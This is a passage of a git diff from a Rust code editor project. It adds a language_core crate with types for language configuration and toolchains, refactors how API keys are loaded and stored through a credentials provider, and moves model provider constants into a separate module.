(e.g., `- [ ] `). + pub continuation: Arc, +} + +#[derive(Clone, Debug, Serialize, Deserialize, Default, JsonSchema)] +pub struct LanguageMatcher { + /// Given a list of `LanguageConfig`'s, the language of a file can be determined based on the path extension matching any of the `path_suffixes`. + #[serde(default)] + pub path_suffixes: Vec, + /// A regex pattern that determines whether the language should be assigned to a file or not. 
+ #[serde( + default, + serialize_with = "serialize_regex", + deserialize_with = "deserialize_regex" + )] + #[schemars(schema_with = "regex_json_schema")] + pub first_line_pattern: Option, + /// Alternative names for this language used in vim/emacs modelines. + /// These are matched case-insensitively against the `mode` (emacs) or + /// `filetype`/`ft` (vim) specified in the modeline. + #[serde(default)] + pub modeline_aliases: Vec, +} + +impl Ord for LanguageMatcher { + fn cmp(&self, other: &Self) -> std::cmp::Ordering { + self.path_suffixes + .cmp(&other.path_suffixes) + .then_with(|| { + self.first_line_pattern + .as_ref() + .map(Regex::as_str) + .cmp(&other.first_line_pattern.as_ref().map(Regex::as_str)) + }) + .then_with(|| self.modeline_aliases.cmp(&other.modeline_aliases)) + } +} + +impl PartialOrd for LanguageMatcher { + fn partial_cmp(&self, other: &Self) -> Option { + Some(self.cmp(other)) + } +} + +impl Eq for LanguageMatcher {} + +impl PartialEq for LanguageMatcher { + fn eq(&self, other: &Self) -> bool { + self.path_suffixes == other.path_suffixes + && self.first_line_pattern.as_ref().map(Regex::as_str) + == other.first_line_pattern.as_ref().map(Regex::as_str) + && self.modeline_aliases == other.modeline_aliases + } +} + +/// The configuration for JSX tag auto-closing. +#[derive(Clone, Deserialize, JsonSchema, Debug)] +pub struct JsxTagAutoCloseConfig { + /// The name of the node for a opening tag + pub open_tag_node_name: String, + /// The name of the node for an closing tag + pub close_tag_node_name: String, + /// The name of the node for a complete element with children for open and close tags + pub jsx_element_node_name: String, + /// The name of the node found within both opening and closing + /// tags that describes the tag name + pub tag_name_node_name: String, + /// Alternate Node names for tag names. 
+ /// Specifically needed as TSX represents the name in `` + /// as `member_expression` rather than `identifier` as usual + #[serde(default)] + pub tag_name_node_name_alternates: Vec, + /// Some grammars are smart enough to detect a closing tag + /// that is not valid i.e. doesn't match it's corresponding + /// opening tag or does not have a corresponding opening tag + /// This should be set to the name of the node for invalid + /// closing tags if the grammar contains such a node, otherwise + /// detecting already closed tags will not work properly + #[serde(default)] + pub erroneous_close_tag_node_name: Option, + /// See above for erroneous_close_tag_node_name for details + /// This should be set if the node used for the tag name + /// within erroneous closing tags is different from the + /// normal tag name node name + #[serde(default)] + pub erroneous_close_tag_name_node_name: Option, +} + +/// The configuration for block comments for this language. +#[derive(Clone, Debug, JsonSchema, PartialEq)] +pub struct BlockCommentConfig { + /// A start tag of block comment. + pub start: Arc, + /// A end tag of block comment. + pub end: Arc, + /// A character to add as a prefix when a new line is added to a block comment. + pub prefix: Arc, + /// A indent to add for prefix and end line upon new line. + #[schemars(range(min = 1, max = 128))] + pub tab_size: u32, +} + +impl<'de> Deserialize<'de> for BlockCommentConfig { + fn deserialize(deserializer: D) -> Result + where + D: Deserializer<'de>, + { + #[derive(Deserialize)] + #[serde(untagged)] + enum BlockCommentConfigHelper { + New { + start: Arc, + end: Arc, + prefix: Arc, + tab_size: u32, + }, + Old([Arc; 2]), + } + + match BlockCommentConfigHelper::deserialize(deserializer)? 
{ + BlockCommentConfigHelper::New { + start, + end, + prefix, + tab_size, + } => Ok(BlockCommentConfig { + start, + end, + prefix, + tab_size, + }), + BlockCommentConfigHelper::Old([start, end]) => Ok(BlockCommentConfig { + start, + end, + prefix: "".into(), + tab_size: 0, + }), + } + } +} + +#[derive(Clone, Deserialize, Default, Debug, JsonSchema)] +pub struct LanguageConfigOverride { + #[serde(default)] + pub line_comments: Override>>, + #[serde(default)] + pub block_comment: Override, + #[serde(skip)] + pub disabled_bracket_ixs: Vec, + #[serde(default)] + pub word_characters: Override>, + #[serde(default)] + pub completion_query_characters: Override>, + #[serde(default)] + pub linked_edit_characters: Override>, + #[serde(default)] + pub opt_into_language_servers: Vec, + #[serde(default)] + pub prefer_label_for_snippet: Option, +} + +#[derive(Clone, Deserialize, Debug, Serialize, JsonSchema)] +#[serde(untagged)] +pub enum Override { + Remove { remove: bool }, + Set(T), +} + +impl Default for Override { + fn default() -> Self { + Override::Remove { remove: false } + } +} + +impl Override { + pub fn as_option<'a>(this: Option<&'a Self>, original: Option<&'a T>) -> Option<&'a T> { + match this { + Some(Self::Set(value)) => Some(value), + Some(Self::Remove { remove: true }) => None, + Some(Self::Remove { remove: false }) | None => original, + } + } +} + +/// Configuration of handling bracket pairs for a given language. +/// +/// This struct includes settings for defining which pairs of characters are considered brackets and +/// also specifies any language-specific scopes where these pairs should be ignored for bracket matching purposes. +#[derive(Clone, Debug, Default, JsonSchema)] +#[schemars(with = "Vec::")] +pub struct BracketPairConfig { + /// A list of character pairs that should be treated as brackets in the context of a given language. + pub pairs: Vec, + /// A list of tree-sitter scopes for which a given bracket should not be active. 
+ /// N-th entry in `[Self::disabled_scopes_by_bracket_ix]` contains a list of disabled scopes for an n-th entry in `[Self::pairs]` + pub disabled_scopes_by_bracket_ix: Vec>, +} + +impl BracketPairConfig { + pub fn is_closing_brace(&self, c: char) -> bool { + self.pairs.iter().any(|pair| pair.end.starts_with(c)) + } +} + +#[derive(Deserialize, JsonSchema)] +pub struct BracketPairContent { + #[serde(flatten)] + pub bracket_pair: BracketPair, + #[serde(default)] + pub not_in: Vec, +} + +impl<'de> Deserialize<'de> for BracketPairConfig { + fn deserialize(deserializer: D) -> std::result::Result + where + D: Deserializer<'de>, + { + let result = Vec::::deserialize(deserializer)?; + let (brackets, disabled_scopes_by_bracket_ix) = result + .into_iter() + .map(|entry| (entry.bracket_pair, entry.not_in)) + .unzip(); + + Ok(BracketPairConfig { + pairs: brackets, + disabled_scopes_by_bracket_ix, + }) + } +} + +/// Describes a single bracket pair and how an editor should react to e.g. inserting +/// an opening bracket or to a newline character insertion in between `start` and `end` characters. +#[derive(Clone, Debug, Default, Deserialize, PartialEq, JsonSchema)] +pub struct BracketPair { + /// Starting substring for a bracket. + pub start: String, + /// Ending substring for a bracket. + pub end: String, + /// True if `end` should be automatically inserted right after `start` characters. + pub close: bool, + /// True if selected text should be surrounded by `start` and `end` characters. + #[serde(default = "default_true")] + pub surround: bool, + /// True if an extra newline should be inserted while the cursor is in the middle + /// of that bracket pair. + pub newline: bool, +} + +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct WrapCharactersConfig { + /// Opening token split into a prefix and suffix. The first caret goes + /// after the prefix (i.e., between prefix and suffix). 
+ pub start_prefix: String, + pub start_suffix: String, + /// Closing token split into a prefix and suffix. The second caret goes + /// after the prefix (i.e., between prefix and suffix). + pub end_prefix: String, + pub end_suffix: String, +} + +pub fn auto_indent_using_last_non_empty_line_default() -> bool { + true +} + +pub fn deserialize_regex<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { + let source = Option::::deserialize(d)?; + if let Some(source) = source { + Ok(Some(regex::Regex::new(&source).map_err(de::Error::custom)?)) + } else { + Ok(None) + } +} + +pub fn regex_json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema { + json_schema!({ + "type": "string" + }) +} + +pub fn serialize_regex(regex: &Option, serializer: S) -> Result +where + S: Serializer, +{ + match regex { + Some(regex) => serializer.serialize_str(regex.as_str()), + None => serializer.serialize_none(), + } +} + +pub fn deserialize_regex_vec<'de, D: Deserializer<'de>>(d: D) -> Result, D::Error> { + let sources = Vec::::deserialize(d)?; + sources + .into_iter() + .map(|source| regex::Regex::new(&source)) + .collect::>() + .map_err(de::Error::custom) +} + +pub fn regex_vec_json_schema(_: &mut SchemaGenerator) -> schemars::Schema { + json_schema!({ + "type": "array", + "items": { "type": "string" } + }) +} diff --git a/crates/language_core/src/language_core.rs b/crates/language_core/src/language_core.rs new file mode 100644 index 0000000000000000000000000000000000000000..f3292e1978d976ce638ebe26c079b939648ffe52 --- /dev/null +++ b/crates/language_core/src/language_core.rs @@ -0,0 +1,39 @@ +// language_core: tree-sitter grammar infrastructure, LSP adapter traits, +// language configuration, and highlight mapping. 
+ +pub mod diagnostic; +pub mod grammar; +pub mod highlight_map; +pub mod language_config; + +pub use diagnostic::{Diagnostic, DiagnosticSourceKind}; +pub use grammar::{ + BracketsConfig, BracketsPatternConfig, DebugVariablesConfig, DebuggerTextObject, Grammar, + GrammarId, HighlightsConfig, IndentConfig, InjectionConfig, InjectionPatternConfig, + NEXT_GRAMMAR_ID, OutlineConfig, OverrideConfig, OverrideEntry, RedactionConfig, + RunnableCapture, RunnableConfig, TextObject, TextObjectConfig, +}; +pub use highlight_map::{HighlightId, HighlightMap}; +pub use language_config::{ + BlockCommentConfig, BracketPair, BracketPairConfig, BracketPairContent, DecreaseIndentConfig, + JsxTagAutoCloseConfig, LanguageConfig, LanguageConfigOverride, LanguageMatcher, + OrderedListConfig, Override, SoftWrap, TaskListConfig, WrapCharactersConfig, + auto_indent_using_last_non_empty_line_default, deserialize_regex, deserialize_regex_vec, + regex_json_schema, regex_vec_json_schema, serialize_regex, +}; + +pub mod code_label; +pub mod language_name; +pub mod lsp_adapter; +pub mod manifest; +pub mod queries; +pub mod toolchain; + +pub use code_label::{CodeLabel, CodeLabelBuilder, Symbol}; +pub use language_name::{LanguageId, LanguageName}; +pub use lsp_adapter::{ + BinaryStatus, LanguageServerStatusUpdate, PromptResponseContext, ServerHealth, ToLspPosition, +}; +pub use manifest::ManifestName; +pub use queries::{LanguageQueries, QUERY_FILENAME_PREFIXES}; +pub use toolchain::{Toolchain, ToolchainList, ToolchainMetadata, ToolchainScope}; diff --git a/crates/language_core/src/language_name.rs b/crates/language_core/src/language_name.rs new file mode 100644 index 0000000000000000000000000000000000000000..764b54a48a566ad98212de3e22bce6aca9a1e393 --- /dev/null +++ b/crates/language_core/src/language_name.rs @@ -0,0 +1,109 @@ +use gpui::SharedString; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use std::{ + borrow::Borrow, + sync::atomic::{AtomicUsize, Ordering::SeqCst}, +}; + 
+static NEXT_LANGUAGE_ID: AtomicUsize = AtomicUsize::new(0); + +#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] +pub struct LanguageId(usize); + +impl LanguageId { + pub fn new() -> Self { + Self(NEXT_LANGUAGE_ID.fetch_add(1, SeqCst)) + } +} + +impl Default for LanguageId { + fn default() -> Self { + Self::new() + } +} + +#[derive( + Debug, Clone, Hash, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize, JsonSchema, +)] +pub struct LanguageName(pub SharedString); + +impl LanguageName { + pub fn new(s: &str) -> Self { + Self(SharedString::new(s)) + } + + pub fn new_static(s: &'static str) -> Self { + Self(SharedString::new_static(s)) + } + + pub fn from_proto(s: String) -> Self { + Self(SharedString::from(s)) + } + + pub fn to_proto(&self) -> String { + self.0.to_string() + } + + pub fn lsp_id(&self) -> String { + match self.0.as_ref() { + "Plain Text" => "plaintext".to_string(), + language_name => language_name.to_lowercase(), + } + } +} + +impl From for SharedString { + fn from(value: LanguageName) -> Self { + value.0 + } +} + +impl From for LanguageName { + fn from(value: SharedString) -> Self { + LanguageName(value) + } +} + +impl AsRef for LanguageName { + fn as_ref(&self) -> &str { + self.0.as_ref() + } +} + +impl Borrow for LanguageName { + fn borrow(&self) -> &str { + self.0.as_ref() + } +} + +impl PartialEq for LanguageName { + fn eq(&self, other: &str) -> bool { + self.0.as_ref() == other + } +} + +impl PartialEq<&str> for LanguageName { + fn eq(&self, other: &&str) -> bool { + self.0.as_ref() == *other + } +} + +impl std::fmt::Display for LanguageName { + fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { + write!(f, "{}", self.0) + } +} + +impl From<&'static str> for LanguageName { + fn from(str: &'static str) -> Self { + Self(SharedString::new_static(str)) + } +} + +impl From for String { + fn from(value: LanguageName) -> Self { + let value: &str = &value.0; + Self::from(value) + } +} diff --git 
a/crates/language_core/src/lsp_adapter.rs b/crates/language_core/src/lsp_adapter.rs new file mode 100644 index 0000000000000000000000000000000000000000..03012f71143428b49ea9d75a03b0118b50e413b4 --- /dev/null +++ b/crates/language_core/src/lsp_adapter.rs @@ -0,0 +1,44 @@ +use gpui::SharedString; +use serde::{Deserialize, Serialize}; + +/// Converts a value into an LSP position. +pub trait ToLspPosition { + /// Converts the value into an LSP position. + fn to_lsp_position(self) -> lsp::Position; +} + +/// Context provided to LSP adapters when a user responds to a ShowMessageRequest prompt. +/// This allows adapters to intercept preference selections (like "Always" or "Never") +/// and potentially persist them to Zed's settings. +#[derive(Debug, Clone)] +pub struct PromptResponseContext { + /// The original message shown to the user + pub message: String, + /// The action (button) the user selected + pub selected_action: lsp::MessageActionItem, +} + +#[derive(Clone, Debug, PartialEq, Eq)] +pub enum LanguageServerStatusUpdate { + Binary(BinaryStatus), + Health(ServerHealth, Option), +} + +#[derive(Debug, PartialEq, Eq, Deserialize, Serialize, Clone, Copy)] +#[serde(rename_all = "camelCase")] +pub enum ServerHealth { + Ok, + Warning, + Error, +} + +#[derive(Clone, Debug, PartialEq, Eq)] +pub enum BinaryStatus { + None, + CheckingForUpdate, + Downloading, + Starting, + Stopping, + Stopped, + Failed { error: String }, +} diff --git a/crates/language_core/src/manifest.rs b/crates/language_core/src/manifest.rs new file mode 100644 index 0000000000000000000000000000000000000000..1e762ff6e7c364eef02eea16ce9e1ecaaa198554 --- /dev/null +++ b/crates/language_core/src/manifest.rs @@ -0,0 +1,36 @@ +use std::borrow::Borrow; + +use gpui::SharedString; + +#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)] +pub struct ManifestName(SharedString); + +impl Borrow for ManifestName { + fn borrow(&self) -> &SharedString { + &self.0 + } +} + +impl Borrow for ManifestName { + fn 
borrow(&self) -> &str { + &self.0 + } +} + +impl From for ManifestName { + fn from(value: SharedString) -> Self { + Self(value) + } +} + +impl From for SharedString { + fn from(value: ManifestName) -> Self { + value.0 + } +} + +impl AsRef for ManifestName { + fn as_ref(&self) -> &SharedString { + &self.0 + } +} diff --git a/crates/language_core/src/queries.rs b/crates/language_core/src/queries.rs new file mode 100644 index 0000000000000000000000000000000000000000..510fb2e03c9b3a6876a2d72180ea238c9a3be4b6 --- /dev/null +++ b/crates/language_core/src/queries.rs @@ -0,0 +1,31 @@ +use std::borrow::Cow; + +pub type QueryFieldAccessor = fn(&mut LanguageQueries) -> &mut Option>; + +pub const QUERY_FILENAME_PREFIXES: &[(&str, QueryFieldAccessor)] = &[ + ("highlights", |q| &mut q.highlights), + ("brackets", |q| &mut q.brackets), + ("outline", |q| &mut q.outline), + ("indents", |q| &mut q.indents), + ("injections", |q| &mut q.injections), + ("overrides", |q| &mut q.overrides), + ("redactions", |q| &mut q.redactions), + ("runnables", |q| &mut q.runnables), + ("debugger", |q| &mut q.debugger), + ("textobjects", |q| &mut q.text_objects), +]; + +/// Tree-sitter language queries for a given language. +#[derive(Debug, Default)] +pub struct LanguageQueries { + pub highlights: Option>, + pub brackets: Option>, + pub indents: Option>, + pub outline: Option>, + pub injections: Option>, + pub overrides: Option>, + pub redactions: Option>, + pub runnables: Option>, + pub text_objects: Option>, + pub debugger: Option>, +} diff --git a/crates/language_core/src/toolchain.rs b/crates/language_core/src/toolchain.rs new file mode 100644 index 0000000000000000000000000000000000000000..a021cb86bd36295a065b16281209c5fc3b63cffc --- /dev/null +++ b/crates/language_core/src/toolchain.rs @@ -0,0 +1,124 @@ +//! Provides core data types for language toolchains. +//! +//! A language can have associated toolchains, +//! which is a set of tools used to interact with the projects written in said language. 
+//! For example, a Python project can have an associated virtual environment; a Rust project can have a toolchain override. + +use std::{path::Path, sync::Arc}; + +use gpui::SharedString; +use util::rel_path::RelPath; + +use crate::{LanguageName, ManifestName}; + +/// Represents a single toolchain. +#[derive(Clone, Eq, Debug)] +pub struct Toolchain { + /// User-facing label + pub name: SharedString, + /// Absolute path + pub path: SharedString, + pub language_name: LanguageName, + /// Full toolchain data (including language-specific details) + pub as_json: serde_json::Value, +} + +impl std::hash::Hash for Toolchain { + fn hash(&self, state: &mut H) { + let Self { + name, + path, + language_name, + as_json: _, + } = self; + name.hash(state); + path.hash(state); + language_name.hash(state); + } +} + +impl PartialEq for Toolchain { + fn eq(&self, other: &Self) -> bool { + let Self { + name, + path, + language_name, + as_json: _, + } = self; + // Do not use as_json for comparisons; it shouldn't impact equality, as it's not user-surfaced. + // Thus, there could be multiple entries that look the same in the UI. + (name, path, language_name).eq(&(&other.name, &other.path, &other.language_name)) + } +} + +/// Declares a scope of a toolchain added by user. +/// +/// When the user adds a toolchain, we give them an option to see that toolchain in: +/// - All of their projects +/// - A project they're currently in. +/// - Only in the subproject they're currently in. +#[derive(Clone, Debug, Eq, PartialEq, Ord, PartialOrd)] +pub enum ToolchainScope { + Subproject(Arc, Arc), + Project, + /// Available in all projects on this box. It wouldn't make sense to show suggestions across machines. 
+ Global, +} + +impl ToolchainScope { + pub fn label(&self) -> &'static str { + match self { + ToolchainScope::Subproject(_, _) => "Subproject", + ToolchainScope::Project => "Project", + ToolchainScope::Global => "Global", + } + } + + pub fn description(&self) -> &'static str { + match self { + ToolchainScope::Subproject(_, _) => { + "Available only in the subproject you're currently in." + } + ToolchainScope::Project => "Available in all locations in your current project.", + ToolchainScope::Global => "Available in all of your projects on this machine.", + } + } +} + +#[derive(Clone, PartialEq, Eq, Hash)] +pub struct ToolchainMetadata { + /// Returns a term which we should use in UI to refer to toolchains produced by a given `ToolchainLister`. + pub term: SharedString, + /// A user-facing placeholder describing the semantic meaning of a path to a new toolchain. + pub new_toolchain_placeholder: SharedString, + /// The name of the manifest file for this toolchain. + pub manifest_name: ManifestName, +} + +type DefaultIndex = usize; +#[derive(Default, Clone, Debug)] +pub struct ToolchainList { + pub toolchains: Vec, + pub default: Option, + pub groups: Box<[(usize, SharedString)]>, +} + +impl ToolchainList { + pub fn toolchains(&self) -> &[Toolchain] { + &self.toolchains + } + pub fn default_toolchain(&self) -> Option { + self.default.and_then(|ix| self.toolchains.get(ix)).cloned() + } + pub fn group_for_index(&self, index: usize) -> Option<(usize, SharedString)> { + if index >= self.toolchains.len() { + return None; + } + let first_equal_or_greater = self + .groups + .partition_point(|(group_lower_bound, _)| group_lower_bound <= &index); + self.groups + .get(first_equal_or_greater.checked_sub(1)?) 
+ .cloned() + } +} diff --git a/crates/language_extension/src/extension_lsp_adapter.rs b/crates/language_extension/src/extension_lsp_adapter.rs index c2062a294d75657b1421982974019454ecba4aa3..3c28e07e6b306ea3a0ce644ac688f9fab8d6125f 100644 --- a/crates/language_extension/src/extension_lsp_adapter.rs +++ b/crates/language_extension/src/extension_lsp_adapter.rs @@ -309,6 +309,7 @@ impl LspAdapter for ExtensionLspAdapter { async fn initialization_options( self: Arc, delegate: &Arc, + _: &mut AsyncApp, ) -> Result> { let delegate = Arc::new(WorktreeDelegateAdapter(delegate.clone())) as _; let json_options = self @@ -349,6 +350,44 @@ impl LspAdapter for ExtensionLspAdapter { }) } + async fn initialization_options_schema( + self: Arc, + delegate: &Arc, + _cached_binary: OwnedMutexGuard>, + _cx: &mut AsyncApp, + ) -> Option { + let delegate = Arc::new(WorktreeDelegateAdapter(delegate.clone())) as _; + let json_schema: Option = self + .extension + .language_server_initialization_options_schema( + self.language_server_id.clone(), + delegate, + ) + .await + .ok() + .flatten(); + json_schema.and_then(|s| serde_json::from_str(&s).ok()) + } + + async fn settings_schema( + self: Arc, + delegate: &Arc, + _cached_binary: OwnedMutexGuard>, + _cx: &mut AsyncApp, + ) -> Option { + let delegate = Arc::new(WorktreeDelegateAdapter(delegate.clone())) as _; + let json_schema: Option = self + .extension + .language_server_workspace_configuration_schema( + self.language_server_id.clone(), + delegate, + ) + .await + .ok() + .flatten(); + json_schema.and_then(|s| serde_json::from_str(&s).ok()) + } + async fn additional_initialization_options( self: Arc, target_language_server_id: LanguageServerName, @@ -508,15 +547,16 @@ fn build_code_label( text.push_str(code_span); } extension::CodeLabelSpan::Literal(span) => { - let highlight_id = language + if let Some(highlight_id) = language .grammar() .zip(span.highlight_name.as_ref()) .and_then(|(grammar, highlight_name)| { 
grammar.highlight_id_for_name(highlight_name) }) - .unwrap_or_default(); - let ix = text.len(); - runs.push((ix..ix + span.text.len(), highlight_id)); + { + let ix = text.len(); + runs.push((ix..ix + span.text.len(), highlight_id)); + } text.push_str(&span.text); } } @@ -644,7 +684,7 @@ fn test_build_code_label() { ); let code_runs = code_ranges .into_iter() - .map(|range| (range, HighlightId(0))) + .map(|range| (range, HighlightId::new(0))) .collect::>(); let label = build_code_label( @@ -667,7 +707,7 @@ fn test_build_code_label() { marked_text_ranges("pqrs.tuv: «fn»(«Bcd»(«Efgh»)) -> «Ijklm»", false); let label_runs = label_ranges .into_iter() - .map(|range| (range, HighlightId(0))) + .map(|range| (range, HighlightId::new(0))) .collect::>(); assert_eq!( @@ -683,7 +723,7 @@ fn test_build_code_label_with_invalid_ranges() { let (code, code_ranges) = marked_text_ranges("const «a»: «B» = '🏀'", false); let code_runs = code_ranges .into_iter() - .map(|range| (range, HighlightId(0))) + .map(|range| (range, HighlightId::new(0))) .collect::>(); // A span uses a code range that is invalid because it starts inside of diff --git a/crates/language_model/Cargo.toml b/crates/language_model/Cargo.toml index a586458e41bab0b12c5f92849659ed33c18f5a68..4712d86dff6c44f9cdd8576a08349ccfa7d0ecca 100644 --- a/crates/language_model/Cargo.toml +++ b/crates/language_model/Cargo.toml @@ -20,11 +20,11 @@ anthropic = { workspace = true, features = ["schemars"] } anyhow.workspace = true credentials_provider.workspace = true base64.workspace = true -client.workspace = true cloud_api_client.workspace = true cloud_api_types.workspace = true cloud_llm_client.workspace = true collections.workspace = true +env_var.workspace = true futures.workspace = true gpui.workspace = true http_client.workspace = true @@ -34,15 +34,12 @@ log.workspace = true open_ai = { workspace = true, features = ["schemars"] } open_router.workspace = true parking_lot.workspace = true -proto.workspace = true schemars.workspace 
= true serde.workspace = true serde_json.workspace = true -settings.workspace = true smol.workspace = true thiserror.workspace = true util.workspace = true -zed_env_vars.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } diff --git a/crates/language_model/src/api_key.rs b/crates/language_model/src/api_key.rs index 754fde069295d8799820020bef286b1a1a3c590c..4be5a64d3db6231c98b830a524d5e299faace457 100644 --- a/crates/language_model/src/api_key.rs +++ b/crates/language_model/src/api_key.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use credentials_provider::CredentialsProvider; +use env_var::EnvVar; use futures::{FutureExt, future}; use gpui::{AsyncApp, Context, SharedString, Task}; use std::{ @@ -7,7 +8,6 @@ use std::{ sync::Arc, }; use util::ResultExt as _; -use zed_env_vars::EnvVar; use crate::AuthenticateError; @@ -101,6 +101,7 @@ impl ApiKeyState { url: SharedString, key: Option, get_this: impl Fn(&mut Ent) -> &mut Self + 'static, + provider: Arc, cx: &Context, ) -> Task> { if self.is_from_env_var() { @@ -108,18 +109,14 @@ impl ApiKeyState { "bug: attempted to store API key in system keychain when API key is from env var", ))); } - let credentials_provider = ::global(cx); cx.spawn(async move |ent, cx| { if let Some(key) = &key { - credentials_provider + provider .write_credentials(&url, "Bearer", key.as_bytes(), cx) .await .log_err(); } else { - credentials_provider - .delete_credentials(&url, cx) - .await - .log_err(); + provider.delete_credentials(&url, cx).await.log_err(); } ent.update(cx, |ent, cx| { let this = get_this(ent); @@ -144,12 +141,13 @@ impl ApiKeyState { &mut self, url: SharedString, get_this: impl Fn(&mut Ent) -> &mut Self + Clone + 'static, + provider: Arc, cx: &mut Context, ) { if url != self.url { if !self.is_from_env_var() { // loading will continue even though this result task is dropped - let _task = self.load_if_needed(url, get_this, cx); + let _task = self.load_if_needed(url, get_this, 
provider, cx); } } } @@ -163,6 +161,7 @@ impl ApiKeyState { &mut self, url: SharedString, get_this: impl Fn(&mut Ent) -> &mut Self + Clone + 'static, + provider: Arc, cx: &mut Context, ) -> Task> { if let LoadStatus::Loaded { .. } = &self.load_status @@ -185,7 +184,7 @@ impl ApiKeyState { let task = if let Some(load_task) = &self.load_task { load_task.clone() } else { - let load_task = Self::load(url.clone(), get_this.clone(), cx).shared(); + let load_task = Self::load(url.clone(), get_this.clone(), provider, cx).shared(); self.url = url; self.load_status = LoadStatus::NotPresent; self.load_task = Some(load_task.clone()); @@ -206,14 +205,13 @@ impl ApiKeyState { fn load( url: SharedString, get_this: impl Fn(&mut Ent) -> &mut Self + 'static, + provider: Arc, cx: &Context, ) -> Task<()> { - let credentials_provider = ::global(cx); cx.spawn({ async move |ent, cx| { let load_status = - ApiKey::load_from_system_keychain_impl(&url, credentials_provider.as_ref(), cx) - .await; + ApiKey::load_from_system_keychain_impl(&url, provider.as_ref(), cx).await; ent.update(cx, |ent, cx| { let this = get_this(ent); this.url = url; diff --git a/crates/language_model/src/fake_provider.rs b/crates/language_model/src/fake_provider.rs index ae01084a2657abdc86e7510aa49663cf98aabe70..50037f31facbac446de7ecf38536d1e4a24c7867 100644 --- a/crates/language_model/src/fake_provider.rs +++ b/crates/language_model/src/fake_provider.rs @@ -125,6 +125,7 @@ pub struct FakeLanguageModel { >, forbid_requests: AtomicBool, supports_thinking: AtomicBool, + supports_streaming_tools: AtomicBool, } impl Default for FakeLanguageModel { @@ -137,6 +138,7 @@ impl Default for FakeLanguageModel { current_completion_txs: Mutex::new(Vec::new()), forbid_requests: AtomicBool::new(false), supports_thinking: AtomicBool::new(false), + supports_streaming_tools: AtomicBool::new(false), } } } @@ -169,6 +171,10 @@ impl FakeLanguageModel { self.supports_thinking.store(supports, SeqCst); } + pub fn 
set_supports_streaming_tools(&self, supports: bool) { + self.supports_streaming_tools.store(supports, SeqCst); + } + pub fn pending_completions(&self) -> Vec { self.current_completion_txs .lock() @@ -282,6 +288,10 @@ impl LanguageModel for FakeLanguageModel { self.supports_thinking.load(SeqCst) } + fn supports_streaming_tools(&self) -> bool { + self.supports_streaming_tools.load(SeqCst) + } + fn telemetry_id(&self) -> String { "fake".to_string() } diff --git a/crates/language_model/src/language_model.rs b/crates/language_model/src/language_model.rs index c403774499c9dcb384e93cf19367dc28e336aa60..3f309b7b1d4152c54324efaaf0ad3bdb7035eea4 100644 --- a/crates/language_model/src/language_model.rs +++ b/crates/language_model/src/language_model.rs @@ -1,28 +1,24 @@ mod api_key; mod model; +mod provider; mod rate_limiter; mod registry; mod request; mod role; -mod telemetry; pub mod tool_schema; #[cfg(any(test, feature = "test-support"))] pub mod fake_provider; -use anthropic::{AnthropicError, parse_prompt_too_long}; use anyhow::{Result, anyhow}; -use client::Client; use cloud_llm_client::CompletionRequestStatus; use futures::FutureExt; use futures::{StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{AnyView, App, AsyncApp, SharedString, Task, Window}; use http_client::{StatusCode, http}; use icons::IconName; -use open_router::OpenRouterError; use parking_lot::Mutex; use serde::{Deserialize, Serialize}; -pub use settings::LanguageModelCacheConfiguration; use std::ops::{Add, Sub}; use std::str::FromStr; use std::sync::Arc; @@ -37,37 +33,19 @@ pub use crate::rate_limiter::*; pub use crate::registry::*; pub use crate::request::*; pub use crate::role::*; -pub use crate::telemetry::*; pub use crate::tool_schema::LanguageModelToolSchemaFormat; -pub use zed_env_vars::{EnvVar, env_var}; +pub use env_var::{EnvVar, env_var}; +pub use provider::*; -pub const ANTHROPIC_PROVIDER_ID: LanguageModelProviderId = - LanguageModelProviderId::new("anthropic"); -pub const 
ANTHROPIC_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("Anthropic"); - -pub const GOOGLE_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("google"); -pub const GOOGLE_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("Google AI"); - -pub const OPEN_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openai"); -pub const OPEN_AI_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("OpenAI"); - -pub const X_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("x_ai"); -pub const X_AI_PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("xAI"); - -pub const ZED_CLOUD_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("zed.dev"); -pub const ZED_CLOUD_PROVIDER_NAME: LanguageModelProviderName = - LanguageModelProviderName::new("Zed"); - -pub fn init(client: Arc, cx: &mut App) { - init_settings(cx); - RefreshLlmTokenListener::register(client, cx); +pub fn init(cx: &mut App) { + registry::init(cx); } -pub fn init_settings(cx: &mut App) { - registry::init(cx); +#[derive(Clone, Debug)] +pub struct LanguageModelCacheConfiguration { + pub max_cache_anchors: usize, + pub should_speculate: bool, + pub min_total_token: u64, } /// A completion event from a language model. 
@@ -309,165 +287,6 @@ impl LanguageModelCompletionError { } } -impl From for LanguageModelCompletionError { - fn from(error: AnthropicError) -> Self { - let provider = ANTHROPIC_PROVIDER_NAME; - match error { - AnthropicError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, - AnthropicError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, - AnthropicError::HttpSend(error) => Self::HttpSend { provider, error }, - AnthropicError::DeserializeResponse(error) => { - Self::DeserializeResponse { provider, error } - } - AnthropicError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, - AnthropicError::HttpResponseError { - status_code, - message, - } => Self::HttpResponseError { - provider, - status_code, - message, - }, - AnthropicError::RateLimit { retry_after } => Self::RateLimitExceeded { - provider, - retry_after: Some(retry_after), - }, - AnthropicError::ServerOverloaded { retry_after } => Self::ServerOverloaded { - provider, - retry_after, - }, - AnthropicError::ApiError(api_error) => api_error.into(), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: 